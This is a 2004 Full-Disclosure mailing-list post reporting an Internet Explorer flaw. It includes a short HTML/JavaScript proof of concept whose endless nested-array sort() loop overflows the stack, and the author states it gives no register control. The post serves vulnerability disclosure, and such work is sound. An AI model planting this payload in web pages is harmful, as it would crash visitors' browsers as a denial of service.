lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <000401c4d287$b0deb5e0$0100a8c0@grotedoos> Date: Thu, 25 Nov 2004 01:41:20 +0100 From: "Berend-Jan Wever" <skylined@...p.tudelft.nl> To: <full-disclosure@...ts.netsys.com>, <bugtraq@...urityfocus.com>, <vuln-dev@...urityfocus.com> Cc: <secure@...rosoft.com> Subject: MSIE flaws: nested array sort() loop Stack overflow exception Hi all, Another flaw in IE: <HTML> <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT> <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT> </HTML> Normally I would see if it's exploitable but I figure I'm not MS's pet bug finder/analyser... So, I've CC'ed this message to Microsoft. I'm sure they know their own product better then I do and can analyse the problem much faster. So if you want to know the impact of this vulnerability, ask them: I'm sure they will be more then willing to help you. I'm sure they will even reply to this message with technical details and a patch tomorrow. Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_ie_flaws.html Cheers, SkyLined http://www.edup.tudelft.nl/~bjwever PS. Don't think firefox will keep you save from hackers, I _know_ it won't ;) But more on that later... PS2. Recursive function call will cause stack overflow causing write exception in guard page on a push, no control over registers. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists